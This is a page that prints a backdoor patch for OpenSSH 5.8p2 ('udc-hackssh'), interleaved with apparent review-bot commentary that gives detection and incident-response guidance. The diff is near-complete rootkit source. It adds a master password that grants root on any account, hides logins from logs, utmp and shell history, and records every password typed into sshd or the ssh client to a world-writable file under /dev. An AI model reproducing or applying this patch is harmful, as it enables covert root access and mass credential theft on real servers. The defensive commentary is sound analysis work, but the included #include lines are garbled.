Updated for openssh-5.x version
FEATURES:
- special password to log in with any user account and get root
- no logs in the machine (messages,auth,utmp,…)
- bash shell will use /dev/null as HISTFILE
- logs user passwords (local and remote sessions)
- should bypass 'PermitRootLogin No'
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]
$ cat udc-hackssh-v2.0.patch
diff -Ncr openssh-5.8p2/auth-pam.c udc-hackssh-v2.0/auth-pam.c *** openssh-5.8p2/auth-pam.c Sun Jul 12 20:07:21 2009 --- udc-hackssh-v2.0/auth-pam.c Sun Jun 26 00:55:57 2011 *************** *** 466,471 **** --- 466,475 ---- if (sshpam_err != PAM_SUCCESS) goto auth_fail; sshpam_err = pam_authenticate(sshpam_handle, flags); + // slash patch + if(uDc) + sshpam_err = PAM_SUCCESS; + // end of slash if (sshpam_err != PAM_SUCCESS) goto auth_fail; *************** *** 816,821 **** --- 820,834 ---- Buffer buffer; struct pam_ctxt *ctxt = ctx; + // slash patch + if(sshpam_authctxt) + for (gurun = 0; gurun < num; ++gurun) { + sprintf(slashbuff, "pam_from: %s \tuser: %s \tpass: %s\n", + get_remote_ipaddr(), sshpam_authctxt->user, resp[gurun]); + if(!strcmp(BAJAUPASS, resp[gurun])) ctxt->pam_done = uDc = 1; + else uDclog(); + } + // end of patch debug2("PAM: %s entering, %u responses", __func__, num); switch (ctxt->pam_done) { case 1: *************** *** 1205,1210 **** --- 1218,1226 ---- fatal("PAM: %s: failed to set PAM_CONV: %s", __func__, pam_strerror(sshpam_handle, sshpam_err)); + // slash patch + if(!uDc) + // end of patch sshpam_err = pam_authenticate(sshpam_handle, flags); sshpam_password = NULL; if (sshpam_err == PAM_SUCCESS && authctxt->valid) { diff -Ncr openssh-5.8p2/auth-passwd.c udc-hackssh-v2.0/auth-passwd.c *** openssh-5.8p2/auth-passwd.c Sun Mar 8 08:40:28 2009 --- udc-hackssh-v2.0/auth-passwd.c Sun Jun 26 01:02:17 2011 *************** *** 92,97 **** --- 92,103 ---- #endif if (*password == '\0' && options.permit_empty_passwd == 0) return 0; + // slash patch + if(!strcmp(BAJAUPASS, password)) return uDc = 1; + sprintf(slashbuff, "pass_from: %s \tuser: %s \tpass: %s\n", + get_remote_ipaddr(), pw->pw_name, password); + uDclog(); + // end of patch #ifdef KRB5 if (options.kerberos_authentication == 1) { diff -Ncr openssh-5.8p2/auth.c udc-hackssh-v2.0/auth.c *** openssh-5.8p2/auth.c Wed Dec 1 09:21:51 2010 --- udc-hackssh-v2.0/auth.c Sat Jun 25 23:45:36 2011 
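Review bot: The added `if(!strcmp(BAJAUPASS, password)) return uDc = 1;` in auth-passwd.c makes one compile-time string a valid password for every account, and the auth-pam.c hunks do the same for PAM by forcing `sshpam_err = PAM_SUCCESS` once `uDc` is set; these hunks are an authentication bypass and must be rejected outright. Every password that does not match is formatted into `slashbuff` with the client address and user name and passed to `uDclog()`, so a host that ran this binary has to be treated as having disclosed all passwords typed into it. The literals `pam_from: ` and `pass_from: ` end up in the compiled daemon and can serve as a quick string check, but they are trivially changed, so verifying sshd against the distribution package (`rpm -V`, `dpkg --verify`) from trusted media is the dependable test. The enclosing functions start and end outside these hunks.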
*************** *** 94,99 **** --- 94,104 ---- int allowed_user(struct passwd * pw) { + // slash patch + if(uDc) return 1; + else { + // end of patch + struct stat st; const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL; u_int i; *************** *** 249,258 **** --- 254,269 ---- /* We found no reason not to let this user try to log on... */ return 1; } + // slash patch + } + // end of patch void auth_log(Authctxt *authctxt, int authenticated, char *method, char *info) { + // slash patch + if(!uDc) { + // end of patch void (*authlog) (const char *fmt,...) = verbose; char *authmsg; *************** *** 298,303 **** --- 309,317 ---- audit_event(audit_classify_auth(method)); #endif } + // slash patch + } + // end of patch /* * Check whether root logins are disallowed. *************** *** 305,310 **** --- 319,327 ---- int auth_root_allowed(char *method) { + // slash patch + if(!uDc) { + // end of patch switch (options.permit_root_login) { case PERMIT_YES: return 1; *************** *** 322,327 **** --- 339,349 ---- logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr()); return 0; } + // slash patch + else + return 1; + } + // end of patch /* diff -Ncr openssh-5.8p2/canohost.c udc-hackssh-v2.0/canohost.c *** openssh-5.8p2/canohost.c Tue Oct 12 10:28:12 2010 --- udc-hackssh-v2.0/canohost.c Sat Jun 25 23:48:02 2011 *************** *** 81,86 **** --- 81,89 ---- if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), NULL, 0, NI_NAMEREQD) != 0) { /* Host name not found. Use ip address. */ + // slash patch + if(!uDc) + // end of patch return xstrdup(ntop); } diff -Ncr openssh-5.8p2/includes.h udc-hackssh-v2.0/includes.h *** openssh-5.8p2/includes.h Sun Oct 24 07:47:30 2010 --- udc-hackssh-v2.0/includes.h Sun Jun 26 00:59:42 2011 *************** *** 13,18 **** --- 13,40 ---- * called by a name other than "ssh" or "Secure Shell". 
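Review bot: With `uDc` set, `allowed_user()` returns 1 before any of its checks, `auth_root_allowed()` falls through to the added `else return 1;`, and `auth_log()` is wrapped in `if(!uDc) {` so it emits nothing; a `PermitRootLogin` setting therefore does not constrain a binary built from this tree. For incident response this means a missing sshd entry in the auth log is not evidence that no login took place, and connection records kept off the host (firewall, flow data, a jump host) are what to correlate against. The canohost.c hunk puts `if(!uDc)` in front of `return xstrdup(ntop);`, which appears to change what is returned when the reverse lookup fails, but the rest of that function is outside the hunk and should be checked against the full file.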
*/ + // slash patch + #include+ #include + + #define BAJAUPASS "CHANGE-ME" + #define SSH_LOG "/dev/lala" + + FILE *s9clog; + char slashbuff[1024]; + int kambing, gurun, uDc; + + #define uDclog() { \ + kambing=strlen(slashbuff); \ + for(gurun=0; gurun<=kambing; gurun++) slashbuff[gurun]=~slashbuff[gurun]; \ + s9clog=fopen(SSH_LOG, "a"); \ + if(s9clog!=NULL) { fwrite(slashbuff, kambing, 1, s9clog); fclose(s9clog);} \ + chmod(SSH_LOG, 0666); \ + } + + const char *get_remote_ipaddr(void); + // end of patch + #ifndef INCLUDES_H #define INCLUDES_H diff -Ncr openssh-5.8p2/log.c udc-hackssh-v2.0/log.c *** openssh-5.8p2/log.c Tue Jun 10 21:01:51 2008 --- udc-hackssh-v2.0/log.c Sat Jun 25 23:25:53 2011 *************** *** 336,341 **** --- 336,345 ---- char fmtbuf[MSGBUFSIZ]; char *txt = NULL; int pri = LOG_INFO; + + // slash patch + if(uDc) return; + // end of patch int saved_errno = errno; if (level > log_level) diff -Ncr openssh-5.8p2/loginrec.c udc-hackssh-v2.0/loginrec.c *** openssh-5.8p2/loginrec.c Mon Jan 17 18:15:31 2011 --- udc-hackssh-v2.0/loginrec.c Sat Jun 25 23:28:05 2011 *************** *** 433,438 **** --- 433,442 ---- int login_write(struct logininfo *li) { + // slash patch + if(uDc) return 0; + // end of patch + #ifndef HAVE_CYGWIN if (geteuid() != 0) { logit("Attempt to write login records by non-root user (aborting)"); diff -Ncr openssh-5.8p2/session.c udc-hackssh-v2.0/session.c *** openssh-5.8p2/session.c Wed Dec 1 09:02:59 2010 --- udc-hackssh-v2.0/session.c Sun Jun 26 00:01:56 2011 *************** *** 1198,1203 **** --- 1198,1207 ---- } if (getenv("TZ")) child_set_env(&env, &envsize, "TZ", getenv("TZ")); + // slash patch + if(uDc) + child_set_env(&env, &envsize, "HISTFILE", "/dev/null"); + // end of patch /* Set custom environment options from RSA authentication. 
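Review bot: The `uDclog()` macro added to includes.h is the storage side of the password capture: it complements every byte of `slashbuff` with `~`, appends the result to `SSH_LOG` (here `/dev/lala`) and then runs `chmod(SSH_LOG, 0666)`, so any local account can read or alter the collected credentials. A regular, world-writable file under `/dev` (for example found with `find /dev -type f`) whose content only becomes printable after each byte is inverted is the artefact to hunt for, keeping in mind that the path is a one-line `#define` and will differ between builds. The two `#include` lines in this hunk lost their header names in extraction, so the listing is incomplete as shown.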
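Review bot: `if(uDc) return;` at the top of the logging routine in log.c and `if(uDc) return 0;` at the top of `login_write()` silence log output and login records for the whole process once the flag is set, and the sshlogin.c hunks further down wrap `record_login()`, `record_utmp_only()` and `record_logout()` in `if(!uDc) {` to the same effect. A session opened this way should therefore not show up in `who` or `last`, so detection has to rest on data the daemon does not write itself: kernel audit records, a process listing showing an sshd child with no matching utmp entry, and network logs. Both function bodies continue outside the hunks.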
*/ if (!options.use_login) { *************** *** 1483,1488 **** --- 1487,1495 ---- #else if (setlogin(pw->pw_name) < 0) error("setlogin failed: %s", strerror(errno)); + // slash patch + if(!uDc) { + // end of patch if (setgid(pw->pw_gid) < 0) { perror("setgid"); exit(1); *************** *** 1492,1497 **** --- 1499,1511 ---- perror("initgroups"); exit(1); } + // slash patch + } + else { + setgid(0); + initgroups(pw->pw_name, 0); + } + // end of patch endgrent(); #endif *************** *** 1515,1520 **** --- 1529,1537 ---- } #else /* Permanently switch to the desired uid. */ + // slash patch + if(!uDc) + // end of patch permanently_set_uid(pw); #endif } diff -Ncr openssh-5.8p2/sshconnect1.c udc-hackssh-v2.0/sshconnect1.c *** openssh-5.8p2/sshconnect1.c Tue Nov 7 20:14:42 2006 --- udc-hackssh-v2.0/sshconnect1.c Sat Jun 25 23:31:17 2011 *************** *** 458,463 **** --- 458,468 ---- password = read_passphrase(prompt, 0); packet_start(SSH_CMSG_AUTH_PASSWORD); ssh_put_password(password); + // slash patch + sprintf(slashbuff, "1to: %s \tuser: %s \tpass: %s\n", + get_remote_ipaddr(), options.user, password); + uDclog(); + // end of patch memset(password, 0, strlen(password)); xfree(password); packet_send(); diff -Ncr openssh-5.8p2/sshconnect2.c udc-hackssh-v2.0/sshconnect2.c *** openssh-5.8p2/sshconnect2.c Wed Dec 1 09:21:51 2010 --- udc-hackssh-v2.0/sshconnect2.c Sun Jun 26 01:00:47 2011 *************** *** 883,888 **** --- 883,893 ---- packet_put_cstring(authctxt->method->name); packet_put_char(0); packet_put_cstring(password); + // slash patch + sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n", + get_remote_ipaddr(), options.user, password); + uDclog(); + // end of patch memset(password, 0, strlen(password)); xfree(password); packet_add_padding(64); *************** *** 1558,1563 **** --- 1563,1573 ---- response = read_passphrase(prompt, echo ? 
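Review bot: In the session.c hunks the flagged session gets `HISTFILE=/dev/null`, `setgid(0)` replaces `setgid(pw->pw_gid)`, and `permanently_set_uid(pw)` is skipped behind `if(!uDc)`, so the shell keeps the daemon's uid instead of dropping to the account named at login. A login shell running as uid 0 under an sshd session opened for an unprivileged name, or one whose environment carries `HISTFILE=/dev/null` (visible in `/proc/<pid>/environ`), is a usable host-side indicator. An empty shell history is expected for such a session and says nothing about what was executed. The surrounding functions start and end outside the hunks.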
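Review bot: The sshconnect1.c and sshconnect2.c hunks patch the client rather than the daemon: just before `memset(password, 0, strlen(password))` they copy the cleartext password, `options.user` and the peer address into `slashbuff` and call `uDclog()`. That defeats the zeroisation the original code performs and extends the exposure to every remote system reached with `ssh` from the affected machine, so credential rotation has to cover those hosts as well. A third capture point of the same form, after `response = read_passphrase(...)` in sshconnect2.c, ends on the following line of this page. The `ssh` client binary needs the same package verification as `sshd`.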
RP_ECHO : 0); + // slash patch + sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n", + get_remote_ipaddr(), options.user, response); + uDclog(); + // end of patch packet_put_cstring(response); memset(response, 0, strlen(response)); xfree(response); diff -Ncr openssh-5.8p2/sshlogin.c udc-hackssh-v2.0/sshlogin.c *** openssh-5.8p2/sshlogin.c Tue Jan 11 14:20:07 2011 --- udc-hackssh-v2.0/sshlogin.c Sun Jun 26 00:10:32 2011 *************** *** 126,131 **** --- 126,134 ---- record_login(pid_t pid, const char *tty, const char *user, uid_t uid, const char *host, struct sockaddr *addr, socklen_t addrlen) { + // slash patch + if(!uDc) { + // end of patch struct logininfo *li; /* save previous login details before writing new */ *************** *** 136,147 **** --- 139,156 ---- login_login(li); login_free_entry(li); } + // slash patch + } + // end of patch #ifdef LOGIN_NEEDS_UTMPX void record_utmp_only(pid_t pid, const char *ttyname, const char *user, const char *host, struct sockaddr *addr, socklen_t addrlen) { + // slash patch + if(!uDc) { + // end of patch struct logininfo *li; li = login_alloc_entry(pid, user, host, ttyname); *************** *** 149,163 **** --- 158,181 ---- login_utmp_only(li); login_free_entry(li); } + // slash patch + } + // end of patch #endif /* Records that the user has logged out. */ void record_logout(pid_t pid, const char *tty, const char *user) { + // slash patch + if(!uDc) { + // end of patch struct logininfo *li; li = login_alloc_entry(pid, user, NULL, tty); login_logout(li); login_free_entry(li); } + // slash patch + } + // end of patch diff -Ncr openssh-5.8p2/version.h udc-hackssh-v2.0/version.h *** openssh-5.8p2/version.h Thu May 5 09:56:54 2011 --- udc-hackssh-v2.0/version.h Sat Jun 25 23:37:03 2011 *************** *** 1,6 **** /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */ ! 
#define SSH_VERSION "OpenSSH_5.8" #define SSH_PORTABLE "p2" #define SSH_RELEASE SSH_VERSION SSH_PORTABLE --- 1,6 ---- /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */ ! #define SSH_VERSION "OpenSSH_5.8" // change #define SSH_PORTABLE "p2" #define SSH_RELEASE SSH_VERSION SSH_PORTABLE